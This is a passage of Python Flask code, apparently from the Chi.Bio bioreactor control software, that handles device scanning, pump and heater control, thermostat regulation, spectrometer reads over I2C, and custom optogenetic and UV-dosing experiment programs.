sysData[M]['Heat']['ON']=0
sysData[M]['UV']['ON']=0
I2CCom(M,'DAC',0,8,int('00000000',2),int('00000000',2),0)#Sets all DAC Channels to zero!!!
setPWM(M,'PWM',sysItems['All'],0,0)
setPWM(M,'Pumps',sysItems['All'],0,0)
SetOutputOn(M,'Stir',0)
SetOutputOn(M,'Thermostat',0)
SetOutputOn(M,'Heat',0)
SetOutputOn(M,'UV',0)
SetOutputOn(M,'Pump1',0)
SetOutputOn(M,'Pump2',0)
SetOutputOn(M,'Pump3',0)
SetOutputOn(M,'Pump4',0)
@application.route('/')
def index():
#Function responsible for sending appropriate device's data to user interface.
global sysData
global sysItems
outputdata=sysData[sysItems['UIDevice']]
for M in ['M0','M1','M2','M3','M4','M5','M6','M7']:
if sysData[M]['present']==1:
outputdata['presentDevices'][M]=1
else:
outputdata['presentDevices'][M]=0
return render_template('index.html',**outputdata)
@application.route('/getSysdata/')
def getSysdata():
#Similar to function above, packages data to be sent to UI.
global sysData
global sysItems
outputdata=sysData[sysItems['UIDevice']]
for M in ['M0','M1','M2','M3','M4','M5','M6','M7']:
if sysData[M]['present']==1:
outputdata['presentDevices'][M]=1
else:
outputdata['presentDevices'][M]=0
return jsonify(outputdata)
@application.route('/changeDevice/<M>',methods=['POST'])
def changeDevice(M):
#Function responsible for changin which device is selected in the UI.
global sysData
global sysItems
M=str(M)
if sysData[M]['present']==1:
for Mb in ['M0','M1','M2','M3','M4','M5','M6','M7']:
sysData[Mb]['UIDevice']=M
sysItems['UIDevice']=M
return ('', 204)
@application.route('/scanDevices/<which>',methods=['POST'])
def scanDevices(which):
#Scans to decide which devices are plugged in/on. Does this by trying to communicate with their internal thermometers (if this communication failes, software assumes device is not present)
global sysData
which=str(which)
if which=="all":
for M in ['M0','M1','M2','M3','M4','M5','M6','M7']:
sysData[M]['present']=1
I2CCom(M,'ThermometerInternal',1,16,0x05,0,0) #We arbitrarily poll the thermometer to see if anything is plugged in!
sysData[M]['DeviceID']=GetID(M)
else:
sysData[which]['present']=1
I2CCom(which,'ThermometerInternal',1,16,0x05,0,0)
sysData[which]['DeviceID']=GetID(which)
return ('', 204)
def GetID(M):
#Gets the CHi.Bio reactor's ID, which is basically just the unique ID of the infrared thermometer.
global sysData
M=str(M)
ID=''
if sysData[M]['present']==1:
pt1=str(I2CCom(M,'ThermometerIR',1,0,0x3C,0,1))
pt2=str(I2CCom(M,'ThermometerIR',1,0,0x3D,0,1))
pt3=str(I2CCom(M,'ThermometerIR',1,0,0x3E,0,1))
pt4=str(I2CCom(M,'ThermometerIR',1,0,0x3F,0,1))
ID = pt1+pt2+pt3+pt4
return ID
def addTerminal(M,strIn):
#Responsible for adding a new line to the terminal in the UI.
global sysData
now=datetime.now()
timeString=now.strftime("%Y-%m-%d %H:%M:%S ")
sysData[M]['Terminal']['text']=timeString + ' - ' + str(strIn) + '</br>' + sysData[M]['Terminal']['text']
@application.route("/ClearTerminal/<M>",methods=['POST'])
def clearTerminal(M):
#Deletes everything from the terminal.
global sysData
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
sysData[M]['Terminal']['text']=''
addTerminal(M,'Terminal Cleared')
return ('', 204)
@application.route("/SetFPMeasurement/<item>/<Excite>/<Base>/<Emit1>/<Emit2>/<Gain>",methods=['POST'])
def SetFPMeasurement(item,Excite,Base,Emit1,Emit2,Gain):
#Sets up the fluorescent protein measurement in terms of gain, and which LED / measurement bands to use.
FP=str(item)
Excite=str(Excite)
Base=str(Base)
Emit1=str(Emit1)
Emit2=str(Emit2)
Gain=str(Gain)
M=sysItems['UIDevice']
if sysData[M][FP]['ON']==1:
sysData[M][FP]['ON']=0
return ('', 204)
else:
sysData[M][FP]['ON']=1
sysData[M][FP]['LED']=Excite
sysData[M][FP]['BaseBand']=Base
sysData[M][FP]['Emit1Band']=Emit1
sysData[M][FP]['Emit2Band']=Emit2
sysData[M][FP]['Gain']=Gain
return ('', 204)
@application.route("/SetOutputTarget/<item>/<M>/<value>",methods=['POST'])
def SetOutputTarget(M,item, value):
#General function used to set the output level of a particular item, ensuring it is within an acceptable range.
global sysData
item = str(item)
value = float(value)
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
print(str(datetime.now()) + " Set item: " + str(item) + " to value " + str(value) + " on " + str(M))
if (value<sysData[M][item]['min']):
value=sysData[M][item]['min']
if (value>sysData[M][item]['max']):
value=sysData[M][item]['max']
sysData[M][item]['target']=value
if(sysData[M][item]['ON']==1 and not(item=='OD' or item=='Thermostat')): #Checking to see if our item is already running, in which case
SetOutputOn(M,item,0) #we turn it off and on again to restart at new rate.
SetOutputOn(M,item,1)
return ('', 204)
@application.route("/SetOutputOn/<item>/<force>/<M>",methods=['POST'])
def SetOutputOn(M,item,force):
#General function used to switch an output on or off.
global sysData
item = str(item)
force = int(force)
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
#The first statements are to force it on or off it the command is called in force mode (force implies it sets it to a given state, regardless of what it is currently in)
if (force==1):
sysData[M][item]['ON']=1
SetOutput(M,item)
return ('', 204)
elif(force==0):
sysData[M][item]['ON']=0;
SetOutput(M,item)
return ('', 204)
#Elsewise this is doing a flip operation (i.e. changes to opposite state to that which it is currently in)
if (sysData[M][item]['ON']==0):
sysData[M][item]['ON']=1
SetOutput(M,item)
return ('', 204)
else:
sysData[M][item]['ON']=0;
SetOutput(M,item)
return ('', 204)
def SetOutput(M,item):
#Here we actually do the digital communications required to set a given output. This function is called by SetOutputOn above as required.
global sysData
global sysItems
global sysDevices
M=str(M)
#We go through each different item and set it going as appropriate.
if(item=='Stir'):
#Stirring is initiated at a high speed for a couple of seconds to prevent the stir motor from stalling (e.g. if it is started at an initial power of 0.3)
if (sysData[M][item]['target']*float(sysData[M][item]['ON'])>0):
setPWM(M,'PWM',sysItems[item],1.0*float(sysData[M][item]['ON']),0) # This line is to just get stirring started briefly.
time.sleep(1.5)
if (sysData[M][item]['target']>0.4 and sysData[M][item]['ON']==1):
setPWM(M,'PWM',sysItems[item],0.5*float(sysData[M][item]['ON']),0) # This line is to just get stirring started briefly.
time.sleep(0.75)
if (sysData[M][item]['target']>0.8 and sysData[M][item]['ON']==1):
setPWM(M,'PWM',sysItems[item],0.7*float(sysData[M][item]['ON']),0) # This line is to just get stirring started briefly.
time.sleep(0.75)
setPWM(M,'PWM',sysItems[item],sysData[M][item]['target']*float(sysData[M][item]['ON']),0)
elif(item=='Heat'):
setPWM(M,'PWM',sysItems[item],sysData[M][item]['target']*float(sysData[M][item]['ON']),0)
elif(item=='UV'):
setPWM(M,'PWM',sysItems[item],sysData[M][item]['target']*float(sysData[M][item]['ON']),0)
elif (item=='Thermostat'):
sysDevices[M][item]['thread']=Thread(target = Thermostat, args=(M,item))
sysDevices[M][item]['thread'].setDaemon(True)
sysDevices[M][item]['thread'].start();
elif (item=='Pump1' or item=='Pump2' or item=='Pump3' or item=='Pump4'):
if (sysData[M][item]['target']==0):
sysData[M][item]['ON']=0
sysDevices[M][item]['thread']=Thread(target = PumpModulation, args=(M,item))
sysDevices[M][item]['thread'].setDaemon(True)
sysDevices[M][item]['thread'].start();
elif (item=='OD'):
SetOutputOn(M,'Pump1',0)
SetOutputOn(M,'Pump2',0) #We turn pumps off when we switch OD state
elif (item=='Zigzag'):
sysData[M]['Zigzag']['target']=5.0
sysData[M]['Zigzag']['SwitchPoint']=sysData[M]['Experiment']['cycles']
elif (item=='LEDA' or item=='LEDB' or item=='LEDC' or item=='LEDD' or item=='LEDE' or item=='LEDF' or item=='LEDG'):
setPWM(M,'PWM',sysItems[item],sysData[M][item]['target']*float(sysData[M][item]['ON']),0)
else: #This is if we are setting the DAC. All should be in range [0,1]
register = int(sysItems['DAC'][item],2)
value=sysData[M][item]['target']*float(sysData[M][item]['ON'])
if (value==0):
value=0
else:
value=(value+0.00)/1.00
sf=0.303 #This factor is scaling down the maximum voltage being fed to the laser, preventing its photodiode current (and hence optical power) being too large.
value=value*sf
binaryValue=bin(int(value*4095.9)) #Bit of a dodgy method for ensuring we get an integer in [0,4095]
toWrite=str(binaryValue[2:].zfill(16))
toWrite1=int(toWrite[0:8],2)
toWrite2=int(toWrite[8:16],2)
I2CCom(M,'DAC',0,8,toWrite1,toWrite2,0)
def PumpModulation(M,item):
#Responsible for turning pumps on/off with an appropriate duty cycle. They are turned on for a fraction of each ~1minute cycle to achieve low pump rates.
global sysData
global sysItems
global sysDevices
sysDevices[M][item]['threadCount']=(sysDevices[M][item]['threadCount']+1)%100 #Index of the particular thread running.
currentThread=sysDevices[M][item]['threadCount']
while (sysDevices[M][item]['active']==1): #Idea is we will wait here if a previous thread on this pump is already running. Potentially all this 'active' business could be removed from this fuction.
time.sleep(0.02)
if (abs(sysData[M][item]['target']*sysData[M][item]['ON'])!=1 and currentThread==sysDevices[M][item]['threadCount']): #In all cases we turn things off to begin
sysDevices[M][item]['active']=1
setPWM(M,'Pumps',sysItems[item]['In1'],0.0*float(sysData[M][item]['ON']),0)
setPWM(M,'Pumps',sysItems[item]['In2'],0.0*float(sysData[M][item]['ON']),0)
setPWM(M,'Pumps',sysItems[item]['In1'],0.0*float(sysData[M][item]['ON']),0)
setPWM(M,'Pumps',sysItems[item]['In2'],0.0*float(sysData[M][item]['ON']),0)
sysDevices[M][item]['active']=0
if (sysData[M][item]['ON']==0):
return
Time1=datetime.now()
cycletime=sysData[M]['Experiment']['cycleTime']*1.05 #We make this marginally longer than the experiment cycle time to avoid too much chaos when you come back around to pumping again.
Ontime=cycletime*abs(sysData[M][item]['target'])
# Decided to remove the below section in order to prevent media buildup in the device if you are pumping in very rapidly. This check means that media is removed, then added. Removing this code means these happen simultaneously.
#if (item=="Pump1" and abs(sysData[M][item]['target'])<0.3): #Ensuring we run Pump1 after Pump2.
# waittime=cycletime*abs(sysData[M]['Pump2']['target']) #We want to wait until the output pump has stopped, otherwise you are very inefficient with your media since it will be pumping out the fresh media fromthe top of the test tube right when it enters.
# time.sleep(waittime+1.0)
if (sysData[M][item]['target']>0 and currentThread==sysDevices[M][item]['threadCount']): #Turning on pumps in forward direction
sysDevices[M][item]['active']=1
setPWM(M,'Pumps',sysItems[item]['In1'],1.0*float(sysData[M][item]['ON']),0)
setPWM(M,'Pumps',sysItems[item]['In2'],0.0*float(sysData[M][item]['ON']),0)
sysDevices[M][item]['active']=0
elif (sysData[M][item]['target']<0 and currentThread==sysDevices[M][item]['threadCount']): #Or backward direction.
sysDevices[M][item]['active']=1
setPWM(M,'Pumps',sysItems[item]['In1'],0.0*float(sysData[M][item]['ON']),0)
setPWM(M,'Pumps',sysItems[item]['In2'],1.0*float(sysData[M][item]['ON']),0)
sysDevices[M][item]['active']=0
time.sleep(Ontime)
if(abs(sysData[M][item]['target'])!=1 and currentThread==sysDevices[M][item]['threadCount']): #Turning off pumps at appropriate time.
sysDevices[M][item]['active']=1
setPWM(M,'Pumps',sysItems[item]['In1'],0.0*float(sysData[M][item]['ON']),0)
setPWM(M,'Pumps',sysItems[item]['In2'],0.0*float(sysData[M][item]['ON']),0)
setPWM(M,'Pumps',sysItems[item]['In1'],0.0*float(sysData[M][item]['ON']),0)
setPWM(M,'Pumps',sysItems[item]['In2'],0.0*float(sysData[M][item]['ON']),0)
sysDevices[M][item]['active']=0
Time2=datetime.now()
elapsedTime=Time2-Time1
elapsedTimeSeconds=round(elapsedTime.total_seconds(),2)
Offtime=cycletime-elapsedTimeSeconds
if (Offtime>0.0):
time.sleep(Offtime)
if (sysData[M][item]['ON']==1 and sysDevices[M][item]['threadCount']==currentThread): #If pumps need to keep going, this starts a new pump thread.
sysDevices[M][item]['thread']=Thread(target = PumpModulation, args=(M,item))
sysDevices[M][item]['thread'].setDaemon(True)
sysDevices[M][item]['thread'].start();
def Thermostat(M,item):
#Function that implements thermostat temperature control using MPC algorithm.
global sysData
global sysItems
global sysDevices
ON=sysData[M][item]['ON']
sysDevices[M][item]['threadCount']=(sysDevices[M][item]['threadCount']+1)%100
currentThread=sysDevices[M][item]['threadCount']
if (ON==0):
SetOutputOn(M,'Heat',0)
return
MeasureTemp(M,'IR') #Measures temperature - note that this may be happening DURING stirring.
CurrentTemp=sysData[M]['ThermometerIR']['current']
TargetTemp=sysData[M]['Thermostat']['target']
LastTemp=sysData[M]['Thermostat']['last']
#MPC Controller Component
MediaTemp=sysData[M]['ThermometerExternal']['current']
MPC=0
if (MediaTemp>0.0):
Tdiff=CurrentTemp-MediaTemp
Pumping=sysData[M]['Pump1']['target']*float(sysData[M]['Pump1']['ON'])*float(sysData[M]['OD']['ON'])
Gain=2.5
MPC=Gain*Tdiff*Pumping
#PI Controller Component
e=TargetTemp-CurrentTemp
dt=sysData[M]['Thermostat']['cycleTime']
I=sysData[M]['Thermostat']['Integral']
if (abs(e)<2.0):
I=I+0.0005*dt*e
P=0.25*e
else:
P=0.5*e;
if (abs(TargetTemp-LastTemp)>2.0): #This resets integrator if we make a big jump in set point.
I=0.0
elif(I<0.0):
I=0.0
elif (I>1.0):
I=1.0
sysData[M]['Thermostat']['Integral']=I
U=P+I+MPC
if(U>1.0):
U=1.0
sysData[M]['Heat']['target']=U
sysData[M]['Heat']['ON']=1
elif(U<0):
U=0
sysData[M]['Heat']['target']=U
sysData[M]['Heat']['ON']=0
else:
sysData[M]['Heat']['target']=U
sysData[M]['Heat']['ON']=1
sysData[M]['Thermostat']['last']=sysData[M]['Thermostat']['target']
SetOutput(M,'Heat')
time.sleep(dt)
if (sysData[M][item]['ON']==1 and sysDevices[M][item]['threadCount']==currentThread):
sysDevices[M][item]['thread']=Thread(target = Thermostat, args=(M,item))
sysDevices[M][item]['thread'].setDaemon(True)
sysDevices[M][item]['thread'].start();
else:
sysData[M]['Heat']['ON']=0
sysData[M]['Heat']['target']=0
SetOutput(M,'Heat')
@application.route("/Direction/<item>/<M>",methods=['POST'])
def direction(M,item):
#Flips direction of a pump.
global sysData
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
sysData[M][item]['target']=-1.0*sysData[M][item]['target']
if (sysData[M]['OD']['ON']==1):
sysData[M][item]['direction']=-1.0*sysData[M][item]['direction']
return ('', 204)
def AS7341Read(M,Gain,ISteps,reset):
#Responsible for reading data from the spectrometer.
global sysItems
global sysData
reset=int(reset)
ISteps=int(ISteps)
if ISteps>255:
ISteps=255 #255 steps is approx 0.71 seconds.
elif (ISteps<0):
ISteps=0
if Gain>10:
Gain=10 #512x
elif (Gain<0):
Gain=0 #0.5x
I2CCom(M,'AS7341',0,8,int(0xA9),int(0x04),0) #This sets us into BANK mode 0, for accesing registers 0x80+. The 4 means we have WTIMEx16
if (reset==1):
I2CCom(M,'AS7341',0,8,int(0x80),int(0x00),0) #Turns power down
time.sleep(0.01)
I2CCom(M,'AS7341',0,8,int(0x80),int(0x01),0) #Turns power on with spectral measurement disabled
else:
I2CCom(M,'AS7341',0,8,int(0x80),int(0x01),0) #Turns power on with spectral measurement disabled
I2CCom(M,'AS7341',0,8,int(0xAF),int(0x10),0) #Tells it we are going to now write SMUX configuration to RAM
#I2CCom(M,'AS7341',0,100,int(0x00),int(0x00),0) #Forces AS7341SMUX to run since length is 100.
AS7341SMUX(M,'AS7341',0,0)
I2CCom(M,'AS7341',0,8,int(0x80),int(0x11),0) #Runs SMUX command (i.e. cofigures SMUX with data from ram)
time.sleep(0.001)
I2CCom(M,'AS7341',0,8,int(0x81),ISteps,0) #Sets number of integration steps of length 2.78ms Max ISteps is 255
I2CCom(M,'AS7341',0,8,int(0x83),0xFF,0) #Sets maxinum wait time of 0.7mS (multiplex by 16 due to WLONG)
I2CCom(M,'AS7341',0,8,int(0xAA),Gain,0) #Sets gain on ADCs. Maximum value of Gain is 10 and can take values from 0 to 10.
#I2CCom(M,'AS7341',0,8,int(0xA9),int(0x14),0) #This sets us into BANK mode 1, for accessing 0x60 to 0x74. The 4 means we have WTIMEx16
#I2CCom(M,'AS7341',0,8,int(0x70),int(0x00),0) #Sets integration mode SPM (normal mode)
#Above is default of 0x70!
I2CCom(M,'AS7341',0,8,int(0x80),int(0x0B),0) #Starts spectral measurement, with WEN (wait between measurements feature) enabled.
time.sleep((ISteps+1)*0.0028 + 0.2) #Wait whilst integration is done and results are processed.
ASTATUS=int(I2CCom(M,'AS7341',1,8,0x94,0x00,0)) #Get measurement status, including saturation details.
C0_L=int(I2CCom(M,'AS7341',1,8,0x95,0x00,0))
C0_H=int(I2CCom(M,'AS7341',1,8,0x96,0x00,0))
C1_L=int(I2CCom(M,'AS7341',1,8,0x97,0x00,0))
C1_H=int(I2CCom(M,'AS7341',1,8,0x98,0x00,0))
C2_L=int(I2CCom(M,'AS7341',1,8,0x99,0x00,0))
C2_H=int(I2CCom(M,'AS7341',1,8,0x9A,0x00,0))
C3_L=int(I2CCom(M,'AS7341',1,8,0x9B,0x00,0))
C3_H=int(I2CCom(M,'AS7341',1,8,0x9C,0x00,0))
C4_L=int(I2CCom(M,'AS7341',1,8,0x9D,0x00,0))
C4_H=int(I2CCom(M,'AS7341',1,8,0x9E,0x00,0))
C5_L=int(I2CCom(M,'AS7341',1,8,0x9F,0x00,0))
C5_H=int(I2CCom(M,'AS7341',1,8,0xA0,0x00,0))
I2CCom(M,'AS7341',0,8,int(0x80),int(0x01),0) #Stops spectral measurement, leaves power on.
#Status2=int(I2CCom(M,'AS7341',1,8,0xA3,0x00,0)) #Reads system status at end of spectral measursement.
#print(str(ASTATUS))
#print(str(Status2))
sysData[M]['AS7341']['current']['ADC0']=int(bin(C0_H)[2:].zfill(8)+bin(C0_L)[2:].zfill(8),2)
sysData[M]['AS7341']['current']['ADC1']=int(bin(C1_H)[2:].zfill(8)+bin(C1_L)[2:].zfill(8),2)
sysData[M]['AS7341']['current']['ADC2']=int(bin(C2_H)[2:].zfill(8)+bin(C2_L)[2:].zfill(8),2)
sysData[M]['AS7341']['current']['ADC3']=int(bin(C3_H)[2:].zfill(8)+bin(C3_L)[2:].zfill(8),2)
sysData[M]['AS7341']['current']['ADC4']=int(bin(C4_H)[2:].zfill(8)+bin(C4_L)[2:].zfill(8),2)
sysData[M]['AS7341']['current']['ADC5']=int(bin(C5_H)[2:].zfill(8)+bin(C5_L)[2:].zfill(8),2)
if (sysData[M]['AS7341']['current']['ADC0']==65535 or sysData[M]['AS7341']['current']['ADC1']==65535 or sysData[M]['AS7341']['current']['ADC2']==65535 or sysData[M]['AS7341']['current']['ADC3']==65535 or sysData[M]['AS7341']['current']['ADC4']==65535 or sysData[M]['AS7341']['current']['ADC5']==65535 ):
print(str(datetime.now()) + ' Spectrometer measurement was saturated on device ' + str(M)) #Not sure if this saturation check above actually works correctly...
return 0
def AS7341SMUX(M,device,data1,data2):
#Sets up the ADC multiplexer on the spectrometer, this is responsible for connecting photodiodes to amplifier/adc circuits within the device.
#The spectrometer has only got 6 ADCs but >6 photodiodes channels, hence you need to select a subset of photodiodes to measure with each shot. The relative gain does change slightly (1-2%) between ADCs.
global sysItems
global sysData
global sysDevices
M=str(M)
Addresses=['0x00','0x01','0x02','0x03','0x04','0x05','0x06','0x07','0x08','0x0A','0x0B','0x0C','0x0D','0x0E','0x0F','0x10','0x11','0x12']
for a in Addresses:
A=sysItems['AS7341'][a]['A']
B=sysItems['AS7341'][a]['B']
if (A!='U'):
As=sysData[M]['AS7341']['channels'][A]
else:
As=0
if (B!='U'):
Bs=sysData[M]['AS7341']['channels'][B]
else:
Bs=0
Ab=str(bin(As))[2:].zfill(4)
Bb=str(bin(Bs))[2:].zfill(4)
C=Ab+Bb
#time.sleep(0.001) #Added this to remove errors where beaglebone crashed!
I2CCom(M,'AS7341',0,8,int(a,16),int(C,2),0) #Tells it we are going to now write SMUX configuration to RAM
#sysDevices[M][device]['device'].write8(int(a,16),int(C,2))
@application.route("/GetSpectrum/<Gain>/<M>",methods=['POST'])
def GetSpectrum(M,Gain):
#Measures entire spectrum, i.e. every different photodiode, which requires 2 measurement shots.
Gain=int(Gain[1:])
global sysData
global sysItems
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
out=GetLight(M,['nm410','nm440','nm470','nm510','nm550','nm583'],Gain,255)
out2=GetLight(M,['nm620', 'nm670','CLEAR','NIR','DARK'],Gain,255)
sysData[M]['AS7341']['spectrum']['nm410']=out[0]
sysData[M]['AS7341']['spectrum']['nm440']=out[1]
sysData[M]['AS7341']['spectrum']['nm470']=out[2]
sysData[M]['AS7341']['spectrum']['nm510']=out[3]
sysData[M]['AS7341']['spectrum']['nm550']=out[4]
sysData[M]['AS7341']['spectrum']['nm583']=out[5]
sysData[M]['AS7341']['spectrum']['nm620']=out2[0]
sysData[M]['AS7341']['spectrum']['nm670']=out2[1]
sysData[M]['AS7341']['spectrum']['CLEAR']=out2[2]
sysData[M]['AS7341']['spectrum']['NIR']=out2[3]
return ('', 204)
def GetLight(M,wavelengths,Gain,ISteps):
#Runs spectrometer measurement and puts data into appropriate structure.
global sysData
M=str(M)
channels=['nm410','nm440','nm470','nm510','nm550','nm583','nm620', 'nm670','CLEAR','NIR','DARK','ExtGPIO', 'ExtINT' , 'FLICKER']
for channel in channels:
sysData[M]['AS7341']['channels'][channel]=0 #First we set all measurement ADC indexes to zero.
index=1;
for wavelength in wavelengths:
if wavelength != "OFF":
sysData[M]['AS7341']['channels'][wavelength]=index #Now assign ADCs to each of the channel where needed.
index=index+1
success=0
while success<2:
try:
AS7341Read(M,Gain,ISteps,success)
success=2
except:
print(str(datetime.now()) + 'AS7341 measurement failed on ' + str(M))
success=success+1
if success==2:
print(str(datetime.now()) + 'AS7341 measurement failed twice on ' + str(M) + ', setting unity values')
sysData[M]['AS7341']['current']['ADC0']=1
DACS=['ADC1', 'ADC2', 'ADC3', 'ADC4', 'ADC5']
for DAC in DACS:
sysData[M]['AS7341']['current'][DAC]=0
output=[0.0,0.0,0.0,0.0,0.0,0.0]
index=0
DACS=['ADC0', 'ADC1', 'ADC2', 'ADC3', 'ADC4', 'ADC5']
for wavelength in wavelengths:
if wavelength != "OFF":
output[index]=sysData[M]['AS7341']['current'][DACS[index]]
index=index+1
return output
def GetTransmission(M,item,wavelengths,Gain,ISteps):
#Gets light transmission through sample by turning on light, measuring, turning off light.
global sysData
M=str(M)
SetOutputOn(M,item,1)
output=GetLight(M,wavelengths,Gain,ISteps)
SetOutputOn(M,item,0)
return output
@application.route("/SetCustom/<Program>/<Status>",methods=['POST'])
def SetCustom(Program,Status):
#Turns a custom program on/off.
global sysData
M=sysItems['UIDevice']
item="Custom"
if sysData[M][item]['ON']==1:
sysData[M][item]['ON']=0
else:
sysData[M][item]['Program']=str(Program)
sysData[M][item]['Status']=float(Status)
sysData[M][item]['ON']=1
sysData[M][item]['param1']=0.0 #Thus parameters get reset each time you restart your program.
sysData[M][item]['param2']=0.0
sysData[M][item]['param3']=0.0
return('',204)
def CustomProgram(M):
#Runs a custom program, some examples are included. You can remove/edit this function as you see fit.
#Note that the custom programs (as set up at present) use an external .csv file with input parameters. THis is done to allow these parameters to easily be varied on the fly.
global sysData
M=str(M)
program=sysData[M]['Custom']['Program']
#Subsequent few lines reads in external parameters from a file if you are using any.
fname='InputParameters_' + str(M)+'.csv'
with open(fname, 'rb') as f:
reader = csv.reader(f)
listin = list(reader)
Params=listin[0]
addTerminal(M,'Running Program = ' + str(program) + ' on device ' + str(M))
if (program=="C1"): #Optogenetic Integral Control Program
integral=0.0 #Integral in integral controller
green=0.0 #Intensity of Green actuation
red=0.0 #Intensity of red actuation.
GFPNow=sysData[M]['FP1']['Emit1']
GFPTarget=sysData[M]['Custom']['Status'] #This is the controller setpoint.
error=GFPTarget-GFPNow
if error>0.0075:
green=1.0
red=0.0
sysData[M]['Custom']['param3']=0.0
elif error<-0.0075:
green=0.0
red=1.0
sysData[M]['Custom']['param3']=0.0
else:
red=1.0
balance=float(Params[0]) #our guess at green light level to get 50% expression.
KI=float(Params[1])
KP=float(Params[2])
integral=sysData[M]['Custom']['param3']+error*KI
green=balance+KP*error+integral
sysData[M]['Custom']['param3']=integral
GreenThread=Thread(target = CustomLEDCycle, args=(M,'LEDD',green))
GreenThread.setDaemon(True)
GreenThread.start();
RedThread=Thread(target = CustomLEDCycle, args=(M,'LEDF',red))
RedThread.setDaemon(True)
RedThread.start();
sysData[M]['Custom']['param1']=green
sysData[M]['Custom']['param2']=red
addTerminal(M,'Program = ' + str(program) + ' green= ' + str(green)+ ' red= ' + str(red) + ' integral= ' + str(integral))
elif (program=="C2"): #UV Integral Control Program
integral=0.0 #Integral in integral controller
UV=0.0 #Intensity of Green actuation
GrowthRate=sysData[M]['GrowthRate']['current']
GrowthTarget=sysData[M]['Custom']['Status'] #This is the controller setpoint.
error=GrowthTarget-GrowthRate
KP=float(Params[0]) #Past data suggest value of ~0.005
KI=float(Params[1]) #Past data suggest value of ~2e-5
integral=sysData[M]['Custom']['param2']+error*KI
if(integral>0):
integral=0.0
sysData[M]['Custom']['param2']=integral
UV=-1.0*(KP*error+integral)
sysData[M]['Custom']['param1']=UV
SetOutputTarget(M,'UV',UV)
SetOutputOn(M,'UV',1)
addTerminal(M,'Program = ' + str(program) + ' UV= ' + str(UV)+ ' integral= ' + str(integral))
elif (program=="C3"): #UV Integral Control Program Mk 2
integral=sysData[M]['Custom']['param2'] #Integral in integral controller
integral2=sysData[M]['Custom']['param3'] #Second integral controller
UV=0.0 #Intensity of UV
GrowthRate=sysData[M]['GrowthRate']['current']
GrowthTarget=sysData[M]['Custom']['Status'] #This is the controller setpoint.
error=GrowthTarget-GrowthRate
KP=float(Params[0]) #Past data suggest value of ~0.005
KI=float(Params[1]) #Past data suggest value of ~2e-5
KI2=float(Params[2])
integral=sysData[M]['Custom']['param2']+error*KI
if(integral>0):
integral=0.0
if(abs(error)<0.3): #This is a second high-gain integrator which only gets cranking along when we are close to the target.
integral2=sysData[M]['Custom']['param3']+error*KI2
if(integral2>0):
integral2=0.0
sysData[M]['Custom']['param2']=integral
sysData[M]['Custom']['param3']=integral2
UV=-1.0*(KP*error+integral+integral2)
m=50.0
UV=(1.0/m)*(math.exp(m*UV)-1.0) #Basically this is to force the UV level to increase exponentially!
sysData[M]['Custom']['param1']=UV
SetOutputTarget(M,'UV',UV)
SetOutputOn(M,'UV',1)
addTerminal(M,'Program = ' + str(program) + ' UV= ' + str(UV)+ ' integral= ' + str(integral))
elif (program=="C4"): #UV Integral Control Program Mk 4
rategain=float(Params[0])
timept=sysData[M]['Custom']['Status'] #This is the timestep as we follow in minutes
UV=0.001*math.exp(timept*rategain) #So we just exponentialy increase UV over time!
sysData[M]['Custom']['param1']=UV
SetOutputTarget(M,'UV',UV)
SetOutputOn(M,'UV',1)
timept=timept+1
sysData[M]['Custom']['Status']=timept
elif (program=="C5"): #UV Dosing program
timept=int(sysData[M]['Custom']['Status']) #This is the timestep as we follow in minutes
sysData[M]['Custom']['Status']=timept+1 #Increment time as we have entered the loop another time!
Pump2Ontime=sysData[M]['Experiment']['cycleTime']*1.05*abs(sysData[M]['Pump2']['target'])*sysData[M]['Pump2']['ON']+0.5 #The amount of time Pump2 is going to be on for following RegulateOD above.
time.sleep(Pump2Ontime) #Pause here is to prevent output pumping happening at the same time as stirring.
timelength=300 #Time between doses in minutes
if(timept%timelength==2): #So this happens every 5 hours!
iters=(timept//timelength)
Dose0=float(Params[0])
Dose=Dose0*(2.0**float(iters)) #UV Dose, in terms of amount of time UV shoudl be left on at 1.0 intensity.
print(str(datetime.now()) + ' Gave dose ' + str(Dose) + " at iteration " + str(iters) + " on device " + str(M))
if (Dose<30.0):
powerlvl=Dose/30.0
SetOutputTarget(M,'UV',powerlvl)
Dose=30.0
else:
SetOutputTarget(M,'UV',1.0) #Ensure UV is on at aopropriate intensity
SetOutputOn(M,'UV',1) #Activate UV
time.sleep(Dose) #Wait for dose to be administered
SetOutputOn(M,'UV',0) #Deactivate UV
elif (program=="C6"): #UV Dosing program 2 - constant value!
timept=int(sysData[M]['Custom']['Status']) #This is the timestep as we follow in minutes
sysData[M]['Custom']['Status']=timept+1 #Increment time as we have entered the loop another time!
Pump2Ontime=sysData[M]['Experiment']['cycleTime']*1.05*abs(sysData[M]['Pump2']['target'])*sysData[M]['Pump2']['ON']+0.5 #The amount of time Pump2 is going to be on for following RegulateOD above.
time.sleep(Pump2Ontime) #Pause here is to prevent output pumping happening at the same time as stirring.
timelength=300 #Time between doses in minutes
if(timept%timelength==2): #So this happens every 5 hours!
iters=(timept//timelength)
if iters>3:
iters=3
Dose0=float(Params[0])
Dose=Dose0*(2.0**float(iters)) #UV Dose, in terms of amount of time UV shoudl be left on at 1.0 intensity.
print(str(datetime.now()) + ' Gave dose ' + str(Dose) + " at iteration " + str(iters) + " on device " + str(M))
if (Dose<30.0):
powerlvl=Dose/30.0
SetOutputTarget(M,'UV',powerlvl)
Dose=30.0
else:
SetOutputTarget(M,'UV',1.0) #Ensure UV is on at aopropriate intensity
SetOutputOn(M,'UV',1) #Activate UV
time.sleep(Dose) #Wait for dose to be administered
SetOutputOn(M,'UV',0) #Deactivate UV
return
def CustomLEDCycle(M,LED,Value):
#This function cycles LEDs for a fraction of 30 seconds during an experiment.
global sysData
M=str(M)
if (Value>1.0):
Value=1.0
if (Value>0.0):
SetOutputOn(M,LED,1)
time.sleep(Value*30.0)#Sleep whatever fraction of 30 seconds we are interested in
SetOutputOn(M,LED,0)
return
@application.route("/SetLightActuation/<Excite>",methods=['POST'])
def SetLightActuation(Excite):
#Basic function used to set which LED is used for optogenetics.
global sysData
M=sysItems['UIDevice']
item="Light"
if sysData[M][item]['ON']==1:
sysData[M][item]['ON']=0
return ('', 204)
else:
sysData[M][item]['Excite']=str(Excite)
sysData[M][item]['ON']=1
return('',204)
def LightActuation(M,toggle):
#Another optogenetic function, turning LEDs on/off during experiment as appropriate.
global sysData
M=str(M)
